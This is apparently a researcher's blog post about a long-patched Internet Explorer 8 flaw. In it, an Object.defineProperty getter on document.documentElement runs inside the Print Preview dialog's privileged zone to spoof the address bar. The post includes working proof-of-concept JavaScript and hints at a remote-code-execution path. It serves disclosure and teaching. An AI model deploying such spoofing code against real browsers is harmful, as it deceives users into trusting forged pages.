IE8 defineProperty Intercepts Internal Dialogs for Address Bar Spoofing

IE8’s Object.defineProperty can override members that IE’s own internal dialogs access on the page’s document. When the Print Preview dialog reads document.documentElement, our getter fires — and because it runs in the context of the Print Preview (which lives in the res://ieframe.dll zone), we can open a window that shows res:// URLs with an arbitrary address bar.

<!-- print_preview.html (loaded in an iframe so ExecWB can trigger Print Preview) -->
<script language="JavaScript">
function openWindowAndPrintPreview()
{
    winRES = window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','RES_WINDOW');
    window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','RES_WINDOW');

    // Open Print Preview via the iframe's ExecWB
    frameElement.ExecWB(7 /*IDM_PRINTPREVIEW*/, 0);
}

Object.defineProperty(document, "documentElement",{get:function()
{
    winRES.location = "javascript:document.body.innerHTML = '<h1>Hacked!</h1>' + " +
                      "'My real location: <b>' + location.href + '</b>';focus();";
}});
</script>

The documentElement getter is called as soon as Print Preview tries to render the page. At that moment the code executes inside the ieframe.dll context, which has no restriction on navigating res:// windows. The result: a window displaying arbitrary content with http://www.google.com in the address bar. If any internal dialog passes an object reference as an argument to a page member, an RCE path opens up through this same mechanism.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS — IE8 defineProperty Accessor Survives Cross-Origin Redirect] :: [IE Resident Script via createElement OBJECT Self-Reference] >